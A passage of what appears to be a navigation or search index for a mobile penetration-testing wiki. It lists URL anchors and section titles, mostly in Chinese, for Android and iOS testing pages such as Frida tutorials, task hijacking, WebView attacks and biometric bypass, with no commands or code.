-pentesting/android-applications-basics.html#aidl---android接口定义语言","mobile-pentesting/android-app-pentesting/android-applications-basics.html#关键概念","mobile-pentesting/android-app-pentesting/android-applications-basics.html#组件","mobile-pentesting/android-app-pentesting/android-applications-basics.html#启动活动和其他活动","mobile-pentesting/android-app-pentesting/android-applications-basics.html#应用子类","mobile-pentesting/android-app-pentesting/android-applications-basics.html#services","mobile-pentesting/android-app-pentesting/android-applications-basics.html#广播接收器","mobile-pentesting/android-app-pentesting/android-applications-basics.html#内容提供者","mobile-pentesting/android-app-pentesting/android-applications-basics.html#webviews","mobile-pentesting/android-app-pentesting/android-applications-basics.html#其他应用组件和移动设备管理","mobile-pentesting/android-app-pentesting/android-applications-basics.html#应用程序的数字签名","mobile-pentesting/android-app-pentesting/android-applications-basics.html#应用验证以增强安全性","mobile-pentesting/android-app-pentesting/android-applications-basics.html#移动设备管理-mdm","mobile-pentesting/android-app-pentesting/android-applications-basics.html#枚举和利用-aidl--binder-服务","mobile-pentesting/android-app-pentesting/android-applications-basics.html#1-发现正在运行的服务","mobile-pentesting/android-app-pentesting/android-applications-basics.html#2-获取接口描述符ping","mobile-pentesting/android-app-pentesting/android-applications-basics.html#3-调用事务","mobile-pentesting/android-app-pentesting/android-applications-basics.html#4-暴力破解未知方法","mobile-pentesting/android-app-pentesting/android-applications-basics.html#5-通过-ontransact-映射代码--方法","mobile-pentesting/android-app-pentesting/android-applications-basics.html#6-发现缺失的权限检查","mobile-pentesting/android-app-pentesting/android-applications-basics.html#7-自动化评估","mobile-pentesting/android-app-pentesting/android-applications-basics.html#参考文献","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#android-任务劫持","mobile-pentesting/android-app-pentest
ing/android-task-hijacking.html#任务后栈和前台活动","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#任务亲和力攻击","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#经典的-singletask--strandhogg-场景","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#默认亲和力无-singletask变体--来电显示案例研究","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#strandhogg-20-cve-2020-0096--基于反射的任务劫持","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#检测与利用清单","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#缓解措施","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#相关-ui-劫持技术","mobile-pentesting/android-app-pentesting/android-task-hijacking.html#参考文献","mobile-pentesting/android-app-pentesting/adb-commands.html#连接","mobile-pentesting/android-app-pentesting/adb-commands.html#多个设备","mobile-pentesting/android-app-pentesting/adb-commands.html#端口隧道","mobile-pentesting/android-app-pentesting/adb-commands.html#包管理器","mobile-pentesting/android-app-pentesting/adb-commands.html#安装卸载","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-install-option","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-uninstall-options","mobile-pentesting/android-app-pentesting/adb-commands.html#包","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-pm-list-packages-options","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-pm-path","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-pm-clear","mobile-pentesting/android-app-pentesting/adb-commands.html#文件管理器","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-pull--local","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-push","mobile-pentesting/android-app-pentesting/adb-commands.html#屏幕捕获屏幕录制","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-screencap","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-screenrec
ord-options","mobile-pentesting/android-app-pentesting/adb-commands.html#shell","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-1","mobile-pentesting/android-app-pentesting/adb-commands.html#pm","mobile-pentesting/android-app-pentesting/adb-commands.html#进程","mobile-pentesting/android-app-pentesting/adb-commands.html#系统","mobile-pentesting/android-app-pentesting/adb-commands.html#日志","mobile-pentesting/android-app-pentesting/adb-commands.html#logcat","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-logcat-选项-过滤规范","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-logcat--b","mobile-pentesting/android-app-pentesting/adb-commands.html#dumpsys","mobile-pentesting/android-app-pentesting/adb-commands.html#adb-shell-dumpsys-options","mobile-pentesting/android-app-pentesting/adb-commands.html#备份","mobile-pentesting/android-app-pentesting/apk-decompilers.html#apk-decompilers","mobile-pentesting/android-app-pentesting/apk-decompilers.html#jd-gui","mobile-pentesting/android-app-pentesting/apk-decompilers.html#jadx","mobile-pentesting/android-app-pentesting/apk-decompilers.html#gda-android-reversing-tool","mobile-pentesting/android-app-pentesting/apk-decompilers.html#bytecode-viewer","mobile-pentesting/android-app-pentesting/apk-decompilers.html#enjarify","mobile-pentesting/android-app-pentesting/apk-decompilers.html#cfr","mobile-pentesting/android-app-pentesting/apk-decompilers.html#fernflower","mobile-pentesting/android-app-pentesting/apk-decompilers.html#krakatau","mobile-pentesting/android-app-pentesting/apk-decompilers.html#procyon","mobile-pentesting/android-app-pentesting/apk-decompilers.html#frida-dexdump","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#avd---android-虚拟设备","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#什么是","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#
gui","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#prepare-virtual-machine","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#run-virtual-machine","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#command-line-tool","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#运行虚拟机","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#命令行选项","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#linux-cli-setup-sdkavd-quickstart","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#来自-cli-的快照","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#armx86-二进制翻译-android-11","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#在-play-store-设备上获取-root","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#install-burp-certificate","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#nice-avd-options","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#take-a-snapshot","mobile-pentesting/android-app-pentesting/avd-android-virtual-device.html#references","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#绕过生物识别认证android","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-1--无加密对象使用的绕过","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-2--异常处理方法","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-3--插桩框架","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-4--逆向工程与代码修改","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-5--使用自定义身份验证工具","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-6--针对-biometricprompt-的通用-frida-hookapi-28-34","mobile-pentesting/android-a
pp-pentesting/bypass-biometric-authentication-android.html#方法-7--降级--回退操控","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#方法-8--供应商--内核级-cve","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#开发人员的加固检查清单快速渗透测试者笔记","mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.html#参考文献","mobile-pentesting/android-app-pentesting/content-protocol.html#列出媒体存储中的文件","mobile-pentesting/android-app-pentesting/content-protocol.html#chrome-对内容提供者的访问","mobile-pentesting/android-app-pentesting/content-protocol.html#chrome-cve-2020-6516-same-origin-policy-bypass","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#drozer-tutorial","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#apks-to-test","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#installation","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#启动服务器","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#有趣的命令","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#包","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#活动","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#内容提供者","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#服务","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#广播接收器","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#是否可调试","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#教程","mobile-pentesting/android-app-pentesting/drozer-tutorial/index.html#更多信息","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#exploiting-content-providers","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#intro","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#从--暴露的内容提供者--获取信息","mobile-pentesti
ng/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#数据库支持的内容提供者","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#查询内容","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#insert-content","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#update-content","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#delete-content","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#sql-injection","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#文件系统支持的内容提供者","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#读取-文件","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#路径遍历","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#2023-2025-更新与现代技巧","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#drozer-3x-python-3-已发布","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#使用内置的-cmd-content-助手-adb--80","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#最近滥用内容提供者的真实世界cve","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#api-30-的加固检查清单","mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.html#参考文献","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#利用可调试应用程序","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#绕过root和可调试检查","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#使android应用可调试并绕过检查的步骤","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#使应用可调试","mobile-pentesting/an
droid-app-pentesting/exploiting-a-debuggeable-applciation.html#绕过检查","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#利用漏洞","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#检查漏洞","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#准备设置","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#在运行时注入代码","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#2024--将--任何--应用程序转变为可调试进程-cve-2024-31317","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#快速poc","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#检测与缓解","mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.html#参考文献","mobile-pentesting/android-app-pentesting/flutter.html#flutter","mobile-pentesting/android-app-pentesting/flutter.html#flutter-1","mobile-pentesting/android-app-pentesting/flutter.html#在flutter中拦截https流量","mobile-pentesting/android-app-pentesting/flutter.html#为什么在flutter中拦截https很棘手","mobile-pentesting/android-app-pentesting/flutter.html#确定确切的flutter堆栈","mobile-pentesting/android-app-pentesting/flutter.html#目标-ssl_crypto_x509_session_verify_cert_chain","mobile-pentesting/android-app-pentesting/flutter.html#选项a--使用-reflutter-进行二进制补丁","mobile-pentesting/android-app-pentesting/flutter.html#选项b--使用-frida-进行实时钩取硬核路径","mobile-pentesting/android-app-pentesting/flutter.html#通过代理强制流量","mobile-pentesting/android-app-pentesting/flutter.html#参考","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#frida-教程","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#安装","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#frida-server-vs-gadget-root-vs-no-root","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#教程","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#tutorial-1","mobile-pentesti
ng/android-app-pentesting/frida-tutorial/index.html#tutorial-2","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#tutorial-3","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#快速示例","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#calling-frida-from-command-line","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#基本-python-脚本","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#hooking-functions-without-parameters","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#对带参数的函数进行-hook-并获取返回值","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#hooking-函数并用我们的输入调用它们","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#获取已创建类的对象","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#其他-frida-教程","mobile-pentesting/android-app-pentesting/frida-tutorial/index.html#参考资料","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#frida-tutorial-1","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#python","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#hook-1---布尔绕过","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#hook-2---函数暴力破解","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#非静态函数","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#静态函数","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#hook-3---检索参数和返回值","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.html#重要","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#frida-tutorial-2","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#第-2-部分","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#python","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#p
art-3","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#python-1","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#js","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#第4部分","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#python-2","mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.html#js-1","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#frida-tutorial-3","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-1","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-2","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-3--frida-trace-frida--16","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#解决方案-4--使用-objection-的单行命令-2024","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#现代-android-备注-2023---2025","mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.html#参考","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#objection-tutorial","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#介绍","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#简介","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#教程","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#安装","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#连接","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#基本操作","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#静态分析变为动态","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#钩住变得简单","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutori
al.html#类实例","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#keystoreintents","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#内存","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#sqlite","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#exit","mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.html#我在-objection-中错过了什么","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#google-ctf-2018---shall-we-play-a-game","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#smali-更改","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#第一次调用-m","mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.html#解决方案","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#不安全的-in-app-update-机制--remote-code-execution-via-malicious-plugins","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#0-quick-triage-does-the-app-have-an-inapp-updater","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#1-识别不安全的-tls-trustmanager","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#2-reverse-engineering-the-update-metadata","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#3-构造恶意插件","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#31-本地库路径-dlopensystemloadlibrary","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#32-dex-based-plugin-path-dexclassloader","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#4-使用-mitmproxy-交付-payload","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#41-绕过签名哈希检查如果存在","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#5-other-attack-surfaces-in-updaters-20232025","mobile-pentesting/an
droid-app-pentesting/insecure-in-app-update-rce.html#6-post-exploitation-ideas","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#detection--mitigation-checklist-blue-team","mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.html#references","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#安装-burp-证书","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#通过-adb-设置系统范围代理","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#在虚拟机上","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#using-magisc","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#learn-how-to-create-a-magisc-module","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#post-android-14","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#bind-mounting-通过-nsenter","mobile-pentesting/android-app-pentesting/install-burp-certificate.html#参考资料","mobile-pentesting/android-app-pentesting/intent-injection.html#intent-injection","mobile-pentesting/android-app-pentesting/intent-injection.html#deep-links--webview-sink-url-parameter-injection","mobile-pentesting/android-app-pentesting/intent-injection.html#启用-javascript-的检查顺序错误","mobile-pentesting/android-app-pentesting/intent-injection.html#其他经典的-intent-注入原语","mobile-pentesting/android-app-pentesting/intent-injection.html#参考文献","mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.html#自动","mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.html#手动","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#手动去混淆技术","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#手动--去混淆技术","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#静态去混淆策略","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#识别混淆","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#去混淆中的动态分析","mobile-pentesting/
android-app-pentesting/manual-deobfuscation.html#动态分析的应用","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#使用-llm-的自动去混淆-androidmeda","mobile-pentesting/android-app-pentesting/manual-deobfuscation.html#参考文献和进一步阅读","mobile-pentesting/android-app-pentesting/react-native-application.html#react-native-应用程序分析","mobile-pentesting/android-app-pentesting/react-native-application.html#javascript-代码","mobile-pentesting/android-app-pentesting/react-native-application.html#webpack","mobile-pentesting/android-app-pentesting/react-native-application.html#在包中快速寻找秘密端点","mobile-pentesting/android-app-pentesting/react-native-application.html#更改-js-代码并重建","mobile-pentesting/android-app-pentesting/react-native-application.html#hermes-字节码","mobile-pentesting/android-app-pentesting/react-native-application.html#修改代码并重建-hermes","mobile-pentesting/android-app-pentesting/react-native-application.html#动态分析","mobile-pentesting/android-app-pentesting/react-native-application.html#使用-frida-在发布版本中启用开发支持注意事项","mobile-pentesting/android-app-pentesting/react-native-application.html#rn-应用中的网络拦截","mobile-pentesting/android-app-pentesting/react-native-application.html#流行-rn-库中的近期问题需要注意的事项","mobile-pentesting/android-app-pentesting/react-native-application.html#参考文献","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#反向分析本地库","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#新提取-libfooso-的快速初筛流程","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#动态插桩-frida--16","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#process-local-jni-telemetry-via-preloaded-so-sotap","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#在-apk-中值得寻找的近期漏洞","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#反逆向与加固趋势android-13-15","mobile-pentesting/android-app-pentesting/reversing-native-libraries.html#资源","mobile-pentesting/android-app-pentesting/reversing-native-libraries
.html#参考资料","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#shizuku-privileged-api","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#1-启动特权服务","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#11-无线-adb-android-11","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#12-usb--本地-adb-一行命令","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#13-已获取root权限的设备","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#14-验证它是否正在运行","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#2-从应用程序绑定","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#3-rish--在-termux-中的提升-shell","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#31-有用的-rish-shell-命令","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#4-安全考虑--检测","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#5-缓解措施","mobile-pentesting/android-app-pentesting/shizuku-privileged-api.html#参考文献","mobile-pentesting/android-app-pentesting/smali-changes.html#smali---反编译修改编译","mobile-pentesting/android-app-pentesting/smali-changes.html#快速方法","mobile-pentesting/android-app-pentesting/smali-changes.html#反编译-apk","mobile-pentesting/android-app-pentesting/smali-changes.html#更改-smali-代码","mobile-pentesting/android-app-pentesting/smali-changes.html#重新编译-apk","mobile-pentesting/android-app-pentesting/smali-changes.html#为新的-apk-签名","mobile-pentesting/android-app-pentesting/smali-changes.html#优化新应用","mobile-pentesting/android-app-pentesting/smali-changes.html#为新的-apk-重新签名又一次","mobile-pentesting/android-app-pentesting/smali-changes.html#修改-smali","mobile-pentesting/android-app-pentesting/smali-changes.html#轻微更改","mobile-pentesting/android-app-pentesting/smali-changes.html#修改函数内变量的初始值","mobile-pentesting/android-app-pentesting/smali-changes.html#基本操作","mobile-pentesting/android-app-pentesting/smali-changes.html#更大的改动","mobile-pentesting/android
-app-pentesting/smali-changes.html#日志记录","mobile-pentesting/android-app-pentesting/smali-changes.html#toast-提示","mobile-pentesting/android-app-pentesting/smali-changes.html#在启动时加载本地库-systemloadlibrary","mobile-pentesting/android-app-pentesting/smali-changes.html#参考资料","mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.html#重要说明","mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.html#参考文献","mobile-pentesting/android-app-pentesting/tapjacking.html#tapjacking","mobile-pentesting/android-app-pentesting/tapjacking.html#基本信息","mobile-pentesting/android-app-pentesting/tapjacking.html#检测","mobile-pentesting/android-app-pentesting/tapjacking.html#保护","mobile-pentesting/android-app-pentesting/tapjacking.html#利用","mobile-pentesting/android-app-pentesting/tapjacking.html#tapjacking-exportedactivity","mobile-pentesting/android-app-pentesting/tapjacking.html#floatingwindowapp","mobile-pentesting/android-app-pentesting/tapjacking.html#qark","mobile-pentesting/android-app-pentesting/tapjacking.html#可访问性覆盖钓鱼银行木马变种","mobile-pentesting/android-app-pentesting/tapjacking.html#工作原理","mobile-pentesting/android-app-pentesting/tapjacking.html#银行木马的典型工作流程","mobile-pentesting/android-app-pentesting/tapjacking.html#检测与缓解","mobile-pentesting/android-app-pentesting/tapjacking.html#参考文献","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-攻击","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-配置和安全指南","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-漏洞概述","mobile-pentesting/android-app-pentesting/webview-attacks.html#webviews-中的文件访问","mobile-pentesting/android-app-pentesting/webview-attacks.html#loadurl","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-和-intent-方案处理","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-bridge","mobile-pentesting/android-app-pentesting/webview-attacks.html#基于反射的远程代码执行-rce","mobile-pentesting/android-app
-pentesting/webview-attacks.html#远程调试","mobile-pentesting/android-app-pentesting/webview-attacks.html#导出任意文件","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-攻击-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-配置和安全指南-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#webview-漏洞概述-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#webviews-中的文件访问-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#loadurl-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#深度链接到内部-webview自定义方案--webview-漏洞","mobile-pentesting/android-app-pentesting/webview-attacks.html#在验证之前启用-javascript检查顺序错误","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-和-intent-方案处理-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#javascript-bridge-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#基于反射的远程代码执行-rce-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#远程调试-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#导出任意文件-1","mobile-pentesting/android-app-pentesting/webview-attacks.html#references","mobile-pentesting/ios-pentesting-checklist.html#ios-pentesting-checklist","mobile-pentesting/ios-pentesting-checklist.html#准备","mobile-pentesting/ios-pentesting-checklist.html#数据存储","mobile-pentesting/ios-pentesting-checklist.html#键盘","mobile-pentesting/ios-pentesting-checklist.html#日志","mobile-pentesting/ios-pentesting-checklist.html#备份","mobile-pentesting/ios-pentesting-checklist.html#应用程序内存","mobile-pentesting/ios-pentesting-checklist.html#破损的加密","mobile-pentesting/ios-pentesting-checklist.html#本地身份验证","mobile-pentesting/ios-pentesting-checklist.html#通过-ipc-暴露敏感功能","mobile-pentesting/ios-pentesting-checklist.html#网络通信","mobile-pentesting/ios-pentesting-checklist.html#其他","mobile-pentesting/ios-pentesting/index.html#ios-pentesting","mobile-pentesting/ios-pentesting/index.html#ios-basics","mobile-pentesting/ios-pentestin
g/index.html#testing-environment","mobile-pentesting/ios-pentesting/index.html#initial-analysis","mobile-pentesting/ios-pentesting/index.html#basic-ios-testing-operations","mobile-pentesting/ios-pentesting/index.html#basic-static-analysis","mobile-pentesting/ios-pentesting/index.html#basic-dynamic-analysis","mobile-pentesting/ios-pentesting/index.html#listing-installed-apps","mobile-pentesting/ios-pentesting/index.html#基本枚举与钩子","mobile-pentesting/ios-pentesting/index.html#ipa结构","mobile-pentesting/ios-pentesting/index.html#二进制逆向","mobile-pentesting/ios-pentesting/index.html#数据存储","mobile-pentesting/ios-pentesting/index.html#plist","mobile-pentesting/ios-pentesting/index.html#core-data","mobile-pentesting/ios-pentesting/index.html#yapdatabase","mobile-pentesting/ios-pentesting/index.html#其他-sqlite-数据库","mobile-pentesting/ios-pentesting/index.html#firebase-实时数据库","mobile-pentesting/ios-pentesting/index.html#realm-数据库","mobile-pentesting/ios-pentesting/index.html#couchbase-lite-数据库","mobile-pentesting/ios-pentesting/index.html#cookies","mobile-pentesting/ios-pentesting/index.html#cache","mobile-pentesting/ios-pentesting/index.html#snapshots","mobile-pentesting/ios-pentesting/index.html#keychain","mobile-pentesting/ios-pentesting/index.html#自定义键盘和键盘缓存","mobile-pentesting/ios-pentesting/index.html#防止文本字段缓存","mobile-pentesting/ios-pentesting/index.html#日志","mobile-pentesting/ios-pentesting/index.html#监控系统日志","mobile-pentesting/ios-pentesting/index.html#备份","mobile-pentesting/ios-pentesting/index.html#安全风险","mobile-pentesting/ios-pentesting/index.html#从备份中排除文件","mobile-pentesting/ios-pentesting/index.html#测试漏洞","mobile-pentesting/ios-pentesting/index.html#修改应用行为","mobile-pentesting/ios-pentesting/index.html#关于敏感数据内存测试的总结","mobile-pentesting/ios-pentesting/index.html#检索和分析内存转储